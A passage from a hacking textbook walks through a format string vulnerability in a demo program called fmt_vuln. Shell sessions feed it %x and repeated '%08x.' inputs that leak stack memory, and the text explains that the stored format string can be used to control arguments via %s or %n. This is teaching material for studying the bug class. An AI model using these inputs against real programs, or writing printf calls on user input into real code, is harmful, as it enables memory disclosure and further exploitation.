Graphics Programs Reference
In-Depth Information
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
Both methods seem to work with the string
testing
. But what happens if
the string contains a format parameter? The format function should try to
evaluate the format parameter and access the appropriate function argument
by adding to the frame pointer. But as we saw earlier, if the appropriate
function argument isn't there, adding to the frame pointer will reference a
piece of memory in a preceding stack frame.
reader@hacking:~/booksrc $ ./fmt_vuln testing%x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
When the
%x
format parameter was used, the hexadecimal representa-
tion of a four-byte word in the stack was printed. This process can be used
repeatedly to examine stack memory.
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
This is what the lower stack memory looks like. Remember that each
four-byte word is backward, due to the little-endian architecture. The bytes
0x25
,
0x30
,
0x38
,
0x78
, and
0x2e
seem to be repeating a lot. Wonder what those
bytes are?
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x.
r
eader@hacking:~/booksrc $
As you can see, they're the memory for the format string itself. Because
the format function will always be on the highest stack frame, as long as the
format string has been stored anywhere on the stack, it will be located below
the current frame pointer (at a higher memory address). This fact can be
used to control arguments to the format function. It is particularly useful if
format parameters that pass by reference are used, such as
%s
or
%n
.
